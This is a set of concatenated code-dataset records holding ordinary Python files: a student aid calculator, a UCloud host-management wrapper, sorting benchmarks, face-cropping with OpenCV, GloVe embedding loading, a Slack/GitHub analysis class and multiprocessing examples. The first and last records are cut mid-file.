0)\n rouge = (255,25,0)\n white = (255,255,255)\n depart = int(time.time())\n temps = time.time()\n conteur =int(temps-depart)\n chiffre=str(conteur)\n arial_font = pygame.font.SysFont(\"arial\",30)\n point_vie = 3\n speed =8\n repouser = speed\n aff_crono = arial_font.render(\"Score : \"+chiffre, True, black)\n ips = 60\n hauteur_x = 1100\n hauteur_y= 675\n clock = pygame.time.Clock()\n variable=[black,rouge,white,depart,temps,conteur,chiffre,arial_font,point_vie,speed,repouser,ips,hauteur_x,hauteur_y,aff_crono]\n\n return(variable)\n","sub_path":"Py-Blast/partie_lilian/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149634657","text":"#******************************************************\r\n#Program Name: extraCredit.py\r\n#Programmer: Gabriela Tolosa Ramirez\r\n#CSC - 119: Fall 2018 - 002\r\n#Date: Oct 22, 2018\r\n#Purpose: Calculate the amount of financial\r\n# assistance for needy families\r\n#Modules used: None\r\n#Input Variable(s): income(float),kids(int)\r\n#Output(s): aid(float)\r\n#******************************************************\r\n\r\n## define if the family can recieve aid based on income and amount of kids\r\n# @parm income indicates the income of the family\r\n# @parm kids indicates the number of kids inthe family\r\n# @return aid indicating the amount of aid the family can/may recieve\r\ndef aidAmount (income,kids):\r\n if income > 30000 and income < 40000 and kids>=3:\r\n aid = \"$1,000 per child\"\r\n return aid\r\n elif income > 20000 and income < 30000 and kids >=2:\r\n aid = \"$1,500 per child\"\r\n return aid\r\n elif income <20000 and kids >= 1:\r\n aid = \"$2,000 per child\"\r\n return aid\r\n else:\r\n aid = \"No aid\"\r\n return aid\r\n\r\ndef main():\r\n cont = 'y'\r\n while cont.lower()==\"y\":\r\n try:\r\n income = float(input(\"What is your family's income? \"))\r\n kids = int(input(\"How many children are in the family? \"))\r\n aid = aidAmount(income,kids)\r\n print(\"The amount of financial assistance that your family may recieve is \\n\" ,aid)\r\n cont = input(\"Do you want to start over?(Y/N) \")\r\n\r\n except Exception as myExc:\r\n print(\"Something went wrong\")\r\n print(\"Maybe one of your values was not a number\")\r\n print(\"The error was:\",myExc)\r\n cont = input(\"Do you want to start over?(Y/N) \")\r\n\r\nmain()\r\ninput()\r\n","sub_path":"Homework/Day 9/extraCredit.py","file_name":"extraCredit.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"248363954","text":"#!/usr/bin/env python\n# vim:set et ts=4 sw=4 fileencoding=utf-8:\n\nfrom base import UcloudBase\nfrom firewall import DescribeSecurityGroup\nimport time\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport re\nimport logging\n\nlogger = logging.getLogger()\nclass CreateCustomImage(UcloudBase):\n pass\n\nclass DescribeImage(UcloudBase):\n def __init__(self, ImageType, ImageId=None, **params):\n params.update(dict(ImageType=ImageType))\n params.update(dict(OsType=\"Linux\"))\n params.update(dict(Limit=100))\n\n self.imageid = ImageId\n if ImageId:\n params.update(dict(ImageId=ImageId))\n\n super(DescribeImage, self).__init__(**params)\n\n def ImageId(self, ImageName):\n for Image in self.res.get(\"ImageSet\"):\n if Image[\"ImageName\"] == ImageName:\n return Image[\"ImageId\"]\n return None\n\n def State(self):\n for Image in self.res.get(\"ImageSet\"):\n if Image[\"ImageId\"] == self.imageid:\n return Image[\"State\"]\n return None\n\n def WaitState(self, hope, step=30, state=\"State\", timeout=120, ignore_timeout=False):\n count=0\n FALG = False\n logger.info(\"WaitImageState: %s\" % hope)\n while True:\n self.request()\n # 镜像的状态\n if state == \"State\":\n if self.State() == hope:\n FALG = True\n\n if FALG:\n logger.info(\"WaitImageState: success\")\n return True\n elif count > timeout:\n if not ignore_timeout:\n raise Exception(\"count: %d > timeout: %d\" % (count, timeout))\n break\n else:\n logger.debug(\"count: %d, sleep: %d, timeout: %d\" % (count, step, timeout))\n time.sleep(step)\n count += 1\n return False\n\n\nclass CreateUHostInstance(UcloudBase):\n def __init__(self, Name, ImageId, SecurityGroupId, configs, **params):\n '''\n configs={\n \"Zone\" : zone,\n \"CPU\" : 2,\n \"Memory\" : 4096,\n \"DiskSpace\" : 100,\n \"Password\" : password,\n }\n '''\n default={\n \"LoginMode\" : \"Password\",\n \"StorageType\": \"LocalDisk\",\n \"Quantity\" : 0, # 购买至月末\n \"UHostType\" : \"Normal\",\n }\n\n params.update(default)\n params.update(configs)\n params.update(dict(Name=Name))\n params.update(dict(ImageId=ImageId))\n params.update(dict(SecurityGroupId=SecurityGroupId))\n\n super(CreateUHostInstance, self).__init__(**params)\n\n def IP(self):\n return self.res.get(\"IPs\")\n\n def UHostId(self):\n return self.res.get(\"UHostIds\")[0]\n\nclass AllocateEIP(UcloudBase):\n def __init__(self, Name, ShareBandwidthId=False, **params):\n ''' 默认为独立带宽, 除非带了共享带宽的ID '''\n default = {\n \"OperatorName\" : \"Bgp\",\n \"ChargeType\" : \"Month\",\n \"Quantity\" : 0,\n \"Bandwidth\" : 5,\n \"PayMode\" : \"Bandwidth\",\n }\n\n params.update(default)\n params.update(dict(Name=Name))\n\n if not re.match('cn-', UcloudBase.common.get(\"Region\")):\n params.update(dict(OperatorName=\"International\"))\n\n if ShareBandwidthId:\n params.update(dict(Bandwidth=0))\n params.update(dict(PayMode=\"ShareBandwidth\"))\n params.update(dict(ShareBandwidthId=ShareBandwidthId))\n\n super(AllocateEIP, self).__init__(**params)\n\n def eipaddr(self):\n return self.res.get(\"EIPSet\")[0].get(\"EIPAddr\")[0].get(\"IP\")\n\n def eipid(self):\n return self.res.get(\"EIPSet\")[0].get(\"EIPId\")\n\nclass BindEIP(UcloudBase):\n def __init__(self, EIPId, ResourceId, **params):\n\n params.update(dict(EIPId=EIPId))\n params.update(dict(ResourceId=ResourceId))\n params.update(dict(ResourceType=\"uhost\"))\n\n super(BindEIP, self).__init__(**params)\n\nclass UpdateEIPAttribute(UcloudBase):\n pass\n\nclass DescribeUHostInstance(UcloudBase):\n\n def __init__(self, UHostId=None, **params):\n\n self.hostid = UHostId\n params.update(dict(Limit=9999))\n\n # 不指定 UHostId 将输出所有实例信息\n if UHostId:\n params.update({ \"UHostIds.0\": UHostId})\n\n super(DescribeUHostInstance, self).__init__(**params)\n\n def State(self):\n return self.GetItemByUHostId(self.hostid, \"State\")\n\n def BootDiskState(self):\n return self.GetItemByUHostId(self.hostid, \"BootDiskState\")\n\n def GetIpAddr(self):\n IPSet = self.GetItemByUHostId(self.hostid, \"IPSet\")\n if IPSet:\n for ip in IPSet:\n if \"IPId\" in ip:\n self.eipaddr = ip[\"IP\"]\n self.eipid = ip[\"IPId\"]\n else:\n self.hostip = ip[\"IP\"]\n else:\n raise Exception(\"IPSet error\")\n\n def GetUHostName(self):\n return self.GetItemByUHostId(self.hostid, \"Name\")\n\n def GetItemByUHostId(self, UHostId, Item):\n for Instance in self.res.get(\"UHostSet\"):\n if Instance[\"UHostId\"] == UHostId:\n return Instance[Item]\n return False\n\n def GetUHostIdByItem(self, params):\n for key in params:\n for Instance in self.res.get(\"UHostSet\"):\n if Instance[key] == params[key]:\n return Instance[\"UHostId\"]\n return False\n\n def GetUHostId(self, params):\n self.GetUHostIdByItem(params)\n\n\n def WaitState(self, hope, state=\"State\", timeout=120, step=1, ignore_timeout=False):\n count=0\n FALG = False\n logger.info(\"Wait%s: %s\" % (state, hope))\n while True:\n self.request()\n # 主机实例状态\n if state == \"State\":\n if self.State() == hope:\n FALG = True\n # 主机实例的系统盘状态\n elif state == \"BootDiskState\":\n if self.BootDiskState() == hope:\n FALG = True\n\n if FALG:\n logger.info(\"Wait%s: success\" % state)\n return True\n elif count > timeout:\n if not ignore_timeout:\n raise Exception(\"count: %d > timeout: %d\" % (count, timeout))\n break\n else:\n logger.debug(\"count: %d, sleep: %d, timeout: %d\" % (count, step, timeout))\n time.sleep(step)\n count += 1\n return False\n\nclass UHostInstance(UcloudBase):\n\n def __init__(self, UHostId, **params):\n\n self.UHostId = UHostId\n params.update(dict(UHostId=UHostId))\n\n super(UHostInstance, self).__init__(**params)\n\nclass StopUHostInstance(UHostInstance):\n pass\nclass StartUHostInstance(UHostInstance):\n pass\nclass RebootUHostInstance(UHostInstance):\n pass\nclass TerminateUHostInstance(UHostInstance):\n pass\nclass ResizeUHostInstance(UHostInstance):\n pass\n\nclass ModifyUHostInstanceRemark(UcloudBase):\n pass\nclass ModifyUHostInstanceName(UcloudBase):\n pass\n\ndef GetHostIdByRemark(Remark):\n AllInstance = DescribeUHostInstance()\n AllInstance()\n return AllInstance.GetUHostIdByItem(dict(Remark=Remark))\n\ndef GetHostNameById(UHostId):\n AllInstance = DescribeUHostInstance(UHostId)\n AllInstance()\n return AllInstance.GetUHostName()\n\ndef GetIpAddrById(UHostId):\n AllInstance = DescribeUHostInstance(UHostId)\n AllInstance()\n AllInstance.GetIpAddr()\n\n return AllInstance.hostip, AllInstance.eipaddr, AllInstance.eipid\n\ndef GetAllHostsEIP():\n pool = {}\n AllInstance = DescribeUHostInstance()\n AllInstance()\n for Instance in AllInstance.res.get(\"UHostSet\"):\n name = Instance[\"Name\"]\n for ip in Instance.get(\"IPSet\"):\n if \"IPId\" in ip:\n pool[name] = ip[\"IP\"]\n return pool\n\ndef GetAllHostsEIPAndTag():\n pool = {}\n AllInstance = DescribeUHostInstance()\n AllInstance()\n for Instance in AllInstance.res.get(\"UHostSet\"):\n name = Instance[\"Name\"]\n for ip in Instance.get(\"IPSet\"):\n if \"IPId\" in ip:\n pool[name] = { \"ip\": ip[\"IP\"], \"tag\": Instance[\"Tag\"] }\n return pool\n\ndef StartHost(hostid):\n StartUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Running\")\n\ndef StopHost(hostid):\n StopUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Stopped\")\n\ndef RebootHost(hostid):\n # 重启主机( 不用云供应商的reboot方法, 改用冷重启)\n StopUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Stopped\")\n StartUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Running\")\n\ndef TerminateHost(hostid):\n # 删除指定主机(危险: 注意备份)\n StopUHostInstance(hostid)()\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Stopped\")\n TerminateUHostInstance(hostid)()\n\ndef ResizeHost(hostid, params):\n # 调整配置\n ResizeUHostInstance(hostid, **params)()\n\ndef CreateHostImage(hostid, ImageName, Zone):\n Instance = DescribeUHostInstance(hostid)\n Instance.WaitState(\"Normal\", \"BootDiskState\", 120, 30)\n StopHost(hostid)\n ImageInfo = CreateCustomImage(Zone=Zone, UHostId=hostid, ImageDescription=ImageName, ImageName=ImageName)()\n Image = DescribeImage(\"Custom\", ImageInfo.get(\"ImageId\"))\n Image.WaitState(\"Available\", timeout=60, step=3, ignore_timeout=True)\n StartHost(hostid)\n Image.WaitState(\"Available\", timeout=120, step=3)\n logger.info(\"CreateHostImage: success, ImageID %s\" % Image.imageid)\n\nclass NewHost():\n\n def __init__(self, project_name, ImageName, configs, ShareBandwidthId=False, ImageType=\"Base\"):\n\n ImageInfo = DescribeImage(ImageType)\n ImageInfo()\n ImageId = ImageInfo.ImageId(ImageName)\n\n SecurityGroupInfo = DescribeSecurityGroup()\n SecurityGroupInfo()\n GroupId = SecurityGroupInfo.GroupId(project_name.upper())\n\n name = \"Unused\"\n\n Instance = CreateUHostInstance(name, ImageId, GroupId, configs)\n Instance()\n\n self.hostip = Instance.IP()[0]\n self.hostid = Instance.UHostId()\n\n EIP = AllocateEIP(name, ShareBandwidthId)\n EIP()\n\n self.eipaddr = EIP.eipaddr()\n self.eipid = EIP.eipid()\n\n bind = BindEIP( self.eipid, self.hostid )\n bind()\n\n logger.info(\"NewGameServer Info HostID: %s, HostIP: %12s, EIPid: %15s, EIP: %s\"\n % (self.hostid, self.hostip, self.eipid, self.eipaddr))\n\n def SetRemark(self, Remark):\n Ins = ModifyUHostInstanceRemark(Remark=Remark, UHostId=self.hostid)\n Ins()\n eip = UpdateEIPAttribute(Remark=Remark, EIPId=self.eipid)\n eip()\n logger.info(\"SetRemark: %s\" % Remark)\n\n def SetHostName(self, Name):\n Ins = ModifyUHostInstanceName(Name=Name, UHostId=self.hostid)\n Ins()\n eip = UpdateEIPAttribute(Name=Name, EIPId=self.eipid)\n eip()\n logger.info(\"SetHostName: %s\" % Name)\n\n def Start(self):\n StartUHostInstance(self.hostid)()\n\n def Stop(self):\n StopUHostInstance(self.hostid)()\n\n def isRunning(self):\n Ins = DescribeUHostInstance(self.hostid)\n return Ins.WaitState(\"Running\")\n\n def isStopped(self):\n Ins = DescribeUHostInstance(self.hostid)\n return Ins.WaitState(\"Stopped\")\n","sub_path":"FusionCli-original/backend/ucloud/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":11660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565961059","text":"import matplotlib as mpl\nfrom random import randint\nimport timeit\n\n\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\ndef desenhaGrafico(x,y, nome, xl = \"Entradas\", yl = \"Saídas\"):\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(x,y, label = \"Melhor Tempo\")\n ax.legend(bbox_to_anchor=(1, 1),bbox_transform=plt.gcf().transFigure)\n plt.ylabel(yl)\n plt.xlabel(xl)\n fig.savefig('nome.png')\nOP=[]\ndef bubble_sort(lista):\n elementos = len(lista)-1\n ordenado = False\n aux=0\n while not ordenado:\n ordenado = True\n for i in range(elementos):\n if lista[i] > lista[i+1]:\n lista[i], lista[i+1] = lista[i+1],lista[i]\n ordenado = False \n aux+=1; \n OP.append(aux) \n return lista\n\ndef geraLista(tam):\n lista = []\n while len(lista) < tam:\n n = randint(1,1*tam)\n if n not in lista: lista.append(n)\n return lista\n\ntempo=[]\nlist=[10000,20000,50000,100000]\nfor i in list:\n\n lista=geraLista(i)\n \n tempo.append(timeit.timeit(\"bubble_sort({})\".format(lista),setup=\"from __main__ import bubble_sort\",number=1))\n print(i)\n\ndesenhaGrafico(list,tempo,'bolha_tempo')\ndesenhaGrafico(list,OP,'bolha_operação')\n","sub_path":"bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"533736525","text":"from unittest.mock import MagicMock\nfrom unittest.mock import sentinel\n\nfrom pytest import fixture\nfrom pytest import raises\n\nfrom sapp.configurator import Configurator\nfrom sapp.configurator import ConfiguratorNotStartedError\nfrom sapp.context_manager import ContextManager\nfrom sapp.plugin import Plugin\n\n\nclass ExamplePlugin(Plugin):\n def enter(self, context):\n context.example = sentinel.example\n\n\nclass ExampleConfigurator(Configurator):\n def append_plugins(self):\n super().append_plugins()\n self.plugin1 = MagicMock()\n self.plugin2 = MagicMock()\n self.plugin3 = ExamplePlugin()\n\n self.add_plugin(self.plugin1)\n self.add_plugin(self.plugin2)\n self.add_plugin(self.plugin3)\n\n\nclass TestConfigurator(object):\n @fixture\n def configurator(self):\n return ExampleConfigurator()\n\n def test_start(self, configurator):\n \"\"\"\n .start should append plugins and init them. Also proper flags should be\n set.\n \"\"\"\n configurator.start(\"wsgi\", wsgi=1)\n\n assert configurator.extra == {\"wsgi\": 1}\n assert configurator.startpoint == \"wsgi\"\n assert configurator.is_started\n\n configurator.plugin1.start.assert_called_once_with(configurator)\n configurator.plugin2.start.assert_called_once_with(configurator)\n\n assert configurator.plugins == [\n configurator.plugin1,\n configurator.plugin2,\n configurator.plugin3,\n ]\n","sub_path":"sapp/tests/test_configurator.py","file_name":"test_configurator.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"579944639","text":"import numpy as np\n\nword_counts_threold=10\nword_counts = {}\nnsents = 0\n# 遍历语料的列表获取词频\nfor sent in all_train_captions:\n nsents+=1\n for w in sent.split(\" \"):\n word_counts[w] = word_counts.get(w,0)+1\n\nvocab = [w for w in word_counts if word_counts[w]>=word_counts_threold]\n\nprint('preprocessed words %d ==> %d' % (len(word_counts), len(vocab)))\n\nidxtoword={}\nwordtoidx={}\nix =1\n\nfor w in vocab:\n idxtoword[ix] = w\n wordtoidx[w] = ix\n\n ix+=1\nvocab_size = len(idxtoword)+1\nprint(vocab_size)\nembeddings_index = {}\n\nwith open(os.path.join(root_path,\"glove.6B.200d.txt\"),encoding=\"UTF-8\") as f:\n for line in tqdm(f):\n values = line.split()\n word = values[0]\n\n coefs = np.asarray(values[1:],dtype=\"float32\")\n\n embeddings_index[word] = coefs\n\nprint(f'Found {len(embeddings_index)} word vectors.')\n\nemb_dim =200\n\nembeddings_matrx = np.zeros((vocab_size,emb_dim))\n\nfor i,word in wordtoidx.items():\n emb_vecctor = embeddings_index.get(word)\n if emb_vecctor is not None:\n embeddings_matrx[i] = emb_vecctor\n","sub_path":"preprocess/emb.py","file_name":"emb.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"540907560","text":"import cv2\n\n# path はここにAnaconda3\\Library\\etc\\haarcascades\n# 場所遠いけど../../\n\n# 潮顔 綾の号\n# \n\n# 顔認識用\nface_cascade_path = './library/haarcascade_frontalface_default.xml'\n\n#face_cascade_path = './library/haarcascade_profileface.xml'\n# 目認識用\neye_cascade_path = './library/haarcascade_eye.xml'\n\nface_cascade = cv2.CascadeClassifier(face_cascade_path)\n\ncount = 0\n\nfor i in range(1, 81):\n src = cv2.imread('./data/yosuke/sample ('+str(i)+').jpg')\n\n # 試しに表示\n # cv2.imshow(\"loaded\", src)\n # キーを待つ\n # cv2.waitKey(0)\n\n src_gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(src_gray)\n\n # detectMultiScaleは顔認識したx,yの位置と,高さと幅が出る\n # rectangle 左上の角の座標、右下の角の座標、色、枠線の太さ\n '''\n for x, y, w, h in faces:\n cv2.rectangle(src, (x, y), (x + w, y + h), (255, 0, 0), 2)\n face = src[y: y + h, x: x + w]\n face_gray = src_gray[y: y + h, x: x + w]\n 目を認識する場合\n eyes = eye_cascade.detectMultiScale(face_gray)\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(face, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2) \n '''\n\n # cv2.imwrite('data/opencv_face_detect_rectangle.jpg', src)\n # print(faces)\n\n # 切り出し\n for rect in faces:\n count += 1\n #cv2.imwrite('demo.jpg', image[rect])\n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n \n # img[y: y + h, x: x + w] \n cv2.imwrite('./redata/koyanagi_' + str(i+1+count) + '.png', src[y:y+h, x:x+w])","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"489291298","text":"from organization_github.organizations import Organizations\nfrom pathlib import Path\nfrom organization_github.repositories import Repositories\nfrom associations.associations import Associations\nfrom slack.element_slack.channels import Channels\nfrom slack.element_slack.users import Users\nfrom slack.urlmessagesslack import UrlMessagesSlack\nfrom slack.workspace.workspace_slackarchive import WorkspacesSlackArchive\nfrom slack.workspace.workspaces_csv import WorkspacesCSV\nfrom slack.workspace.workspaces_raw import WorkspacesRaw\nimport csv\nimport threading\nimport os\n\n\nclass Containers:\n\n def __init__(self, ):\n self._associations: list = list()\n\n def add_association(self, name_organization, path, tokens):\n directory = 'issue&pull ' + name_organization\n organization: Organizations = Organizations(directory, name_organization, tokens)\n organization.get_scv_repositories()\n organization.get_first_filter()\n organization.get_second_filter()\n organization.get_third_filter()\n organization.get_fourth_filter()\n organization.get_fifth_filter()\n organization.get_sixth_filter()\n p = Path(path)\n workspace = None\n if p.is_file() and p.suffix == \".csv\":\n workspace = WorkspacesCSV(path)\n else:\n try:\n workspace = WorkspacesSlackArchive(path, name_organization)\n except FileNotFoundError:\n workspace = WorkspacesRaw(path, name_organization)\n if workspace is not None:\n workspace.get_csv_channel_organization()\n for name_channel in workspace.get_names_channel():\n if organization.contain_association(name_channel):\n repositories = organization.get_association(name_channel)\n workspace.get_channel(name_channel)\n for repository in repositories:\n association: Associations = Associations(directory, repository,\n workspace.get_channel(name_channel),\n name_organization, organization.get_name_file_issue(),\n organization.get_name_file_comments_issue(),\n organization.get_name_file_pull_request(),\n organization.get_name_file_comments_pull_request())\n self._associations.append(association)\n\n def messages_for_channel(self):\n for association in self._associations:\n channel: Channels = association.get_channel()\n file = open(\n \"messages for channel \" + channel.get_name_channel() + \" of \" +\n association.get_name_organization() + \".csv\",\n \"wt\")\n try:\n writer: csv.DictWriter = csv.writer(file, quoting=csv.QUOTE_NONNUMERIC)\n writer.writerow((\"Workspace\", \"Channel\", \"Id\", \"Sender\", \"text\", \"time\", \"mention\"))\n name_workspace = association.get_name_organization()\n senders = channel.get_users()\n for key in senders:\n sender: Users = senders.get(key)\n messages = sender.show_messages()\n if messages is not None and len(messages) != 0:\n for message in messages:\n mentions: str = \"\"\n for mention in message.get_mentions():\n mentions = mentions + \", \" + str(mention)\n writer.writerow((name_workspace, channel.get_name_channel(), sender.get_id_user(),\n sender.get_name_user(), message.get_message(),\n message.get_time(), mentions))\n finally:\n file.close()\n\n def correspondence_channel_to_archive(self, organization):\n name_file = 'correspondence channel to archive in ' + organization + '.csv'\n file = open(name_file, 'wt')\n try:\n writer: csv.DictWriter = csv.writer(file)\n writer.writerow(\n ('Name Channel', 'Name Repository', 'url html', 'percentage programming file',\n 'has pull request merged',\n 'use issue for tracking',\n '# contributors', '# commits', 'last update at least in 2018'))\n for association in self._associations:\n channel: Channels = association.get_channel()\n repository: Repositories = association.get_repository()\n writer.writerow((channel.get_name_channel(),\n repository.get_repository_name(), repository.get_url_html(),\n repository.get_percentage_programming_files(),\n repository.has_pull_request_merged(), repository.use_issue_for_tracking(),\n len(repository.get_contributors()), repository.get_number_of_commits(),\n repository.last_update_at_least_in_2018()))\n finally:\n file.close()\n\n def pull_request_on_message_slack(self):\n list_thread = list()\n for association in self._associations:\n channel: Channels = association.get_channel()\n repository: Repositories = association.get_repository()\n thread = threading.Thread(target=self._create_file_pull, args=(channel, repository))\n thread.start()\n list_thread.append(thread)\n for thread in list_thread:\n thread.join()\n\n @staticmethod\n def _create_file_pull(channel, repository):\n file = open(\n 'pull request url in message in ' + channel.get_name_channel() + ' ' +\n repository.get_repository_name() + '.csv', 'w')\n try:\n writer: csv.DictWriter = csv.writer(file)\n writer.writerow(('pr url', 'merged', 'count'))\n pulls = repository.get_pulls()\n for pull in pulls:\n count_pr_url = 0\n if pull.get_state() == 'closed':\n users = channel.get_users()\n for user_key in users:\n user = users.get(user_key)\n for message in user.show_messages():\n text = message.get_message()\n if text.find(pull.get_html_url()) != -1:\n length = len(pull.get_html_url()) + text.find(pull.get_html_url())\n if len(text) > length and (\n text[length] == '>' or text[length] == ' '):\n count_pr_url = count_pr_url + 1\n elif len(text) == length:\n count_pr_url = count_pr_url + 1\n writer.writerow((pull.get_html_url(), pull.is_merged(), count_pr_url))\n finally:\n file.close()\n\n def get_len_message_for_channel(self, organization):\n file = open(\n 'number of messages ' + organization + '.csv', 'w')\n try:\n writer: csv.DictWriter = csv.writer(file)\n writer.writerow(('organization', 'channel slack', '# messages'))\n for association in self._associations:\n channel: Channels = association.get_channel()\n len_message_channel = 0\n users = channel.get_users()\n for user_key in users:\n user: Users = users.get(user_key)\n len_message_channel = len_message_channel + user.len_messages()\n writer.writerow((association.get_name_organization(), channel.get_name_channel(), len_message_channel))\n finally:\n file.close()\n\n def messages_slack_url_github(self):\n for association in self._associations:\n path = 'message url ' + association.get_name_organization()\n if os.path.isdir(path) is not True:\n os.makedirs(path)\n url_message_slack = UrlMessagesSlack(association)\n url_message_slack.generic_url_github()\n url_message_slack.issue_open_in_this_repository()\n url_message_slack.issue_open_not_in_this_repository()\n url_message_slack.issue_closed_in_this_repository()\n url_message_slack.issue_closed_not_in_this_repository()\n url_message_slack.pull_open_in_this_repository()\n url_message_slack.pull_open_not_in_this_repository()\n url_message_slack.pull_closed_in_this_repository()\n url_message_slack.pull_closed_not_in_this_repository()\n url_message_slack.dif_message_date()\n\n\n","sub_path":"containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165752446","text":"import multiprocessing\nimport week3_multiprocessing_import\nimport time\nimport sys\nimport logging\n\n\ndef multiprocessing_simple():\n def worker():\n print('worker')\n for i in range(5):\n jobs =[]\n p=multiprocessing.Process(target=worker)\n jobs.append(p)\n p.start()\n\ndef multiprocessing_simpleags():\n def worker(num):\n print(\"worker\",num)\n jobs =[]\n for i in range(5):\n p =multiprocessing.Process(target=worker,args=(i,))\n jobs.append(p)\n p.start()\n\ndef multiprocessing_import_main():\n jobs =[]\n for i in range(5):\n p =multiprocessing.Process(\n target=week3_multiprocessing_import.worker,\n )\n jobs.append(p)\n p.start()\n\ndef multiprocessing_names():\n def worker():\n name=multiprocessing.current_process().name #获取当前进程的名字\n print(name,'Starting')\n time.sleep(2)\n print(name,'Exiting')\n \n def my_service():\n name =multiprocessing.current_process().name\n print(name,'Staring')\n time.sleep(3)\n print(name,'Exiting')\n \n service =multiprocessing.Process(\n name=\"my_service\",\n target=my_service,\n )\n\n worker_1 =multiprocessing.Process(\n name=\"worker_1\",\n target=worker,\n )\n\n worker_2 =multiprocessing.Process(\n target=worker,\n )\n\n worker_1.start()\n worker_2.start()\n service.start()\n\ndef multiprocessing_daemon():\n def daemon():\n p=multiprocessing.current_process()\n print('starting:',p.name,p.pid)\n sys.stdout.flush()\n #在Linux系统下,必须加入sys.stdout.flush()才能一秒输一个数字\n #在Windows系统下,加不加sys.stdout.flush()都能一秒输出一个数字\n time.sleep(2)\n print('exiting:',p.name,p.pid)\n sys.stdout.flush()\n \n def non_daemon():\n p=multiprocessing.current_process()\n print('starting:',p.name,p.pid)\n sys.stdout.flush()\n print('exiting:',p.name,p.pid)\n sys.stdout.flush()\n\n d =multiprocessing.Process(\n name='daemon',\n target=daemon,\n )\n d.daemon =True\n\n n =multiprocessing.Process(\n name='non-daemon',\n target=non_daemon,\n )\n \n n.daemon =False\n\n #n.start()\n d.start()\n time.sleep(1)\n n.start()\n\ndef multiprocessing_daemon_join():\n def daemon():\n name =multiprocessing.current_process().name\n print('starting:',name)\n time.sleep(2)\n print('exiting:',name)\n \n def non_daemon():\n name =multiprocessing.current_process().name\n print('starting:',name)\n print('exiting:',name)\n\n d =multiprocessing.Process(\n name ='daemon',\n target=daemon\n ) \n d.daemon =True\n\n n =multiprocessing.Process(\n name ='non-daemon',\n target=non_daemon\n )\n n.daemon =False\n\n d.start() \n n.start()\n\n d.join(3)\n print('d.is_alive()',d.is_alive())\n n.join() \n\ndef multiprocessing_terminate():\n #但是如果进程似乎挂起或死锁,则可以强制将其杀死。 。调用terminate() 流程对象将杀死子流程。\n def slow_worker():\n print('starting worker')\n time.sleep(0.2)\n print('finished worker')\n\n p =multiprocessing.Process(target=slow_worker)\n print('BEFORE',p,p.is_alive())\n\n p.start()\n print('DURING:',p,p.is_alive())\n\n time.sleep(0.1)\n p.terminate()\n print('TERMINATED',p,p.is_alive())\n\n p.join()\n print('JOINED:',p,p.is_alive())\n\ndef multiprocessing_exitcode():\n def exit_error():\n sys.exit(1)\n \n def exit_ok():\n return\n \n def return_value():\n return 1\n \n def rais_runtimeError():\n raise RuntimeError('There was an error!')\n \n def terminated():\n time.sleep(3)\n\n jobs =[]\n funcs =[\n exit_error,\n exit_ok,\n return_value,\n rais_runtimeError,\n terminated,\n ] \n for fuc in funcs:\n print('starting process for',fuc.__name__)\n j =multiprocessing.Process(target=fuc,name =fuc.__name__)\n jobs.append(j)\n j.start()\n \n jobs[-1].terminate()\n \n for job in jobs:\n #exitcode ==0:没有产生错误 >0:该过程有一个错误,并退出该代码 <0:这个过程杀死了-1*exitcode\n job.join()\n print('{:>15}.exitcode ={}'.format(job.name,job.exitcode))\n \n\ndef multiprocessing_log_to_stderr():\n def worker():\n print('Doing some work')\n sys.stdout.flush()\n\n multiprocessing.log_to_stderr(logging.DEBUG)\n logger =multiprocessing.get_logger() #通过get_logger来设置记录\n logger.setLevel(logging.INFO)\n p =multiprocessing.Process(target=worker)\n p.start()\n p.join()\n\n\ndef multiprocessing_subclass():\n #重写run方法\n class Worker(multiprocessing.Process):\n def run(self):\n print('In{}'.format(self.name))\n return\n\n jobs =[]\n for i in range(5):\n p =Worker()\n jobs.append(p)\n p.start()\n \n for j in jobs:\n j.join()\n\n\nif __name__ ==\"__main__\":\n multiprocessing_log_to_stderr()\n","sub_path":"week3-multiprocessing.py","file_name":"week3-multiprocessing.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362033125","text":"\"\"\"\nConvert EWT to a corpus of txt files.\n\nOnly works on unix systems.\n\"\"\"\nimport os\n\nfrom spacy.training import Corpus\nimport spacy\n\nd_path = \"syllabus/classes/class2/data\"\nwrite_path = \"syllabus/classes/class2/train_corpus\"\n\nfor ds in [\"dev\", \"test\", \"train\"]:\n cmd = f\"python -m spacy convert {d_path}/UD_English-EWT-master/en_ewt-ud-{ds}.conllu {d_path} --converter conllu --n-sents 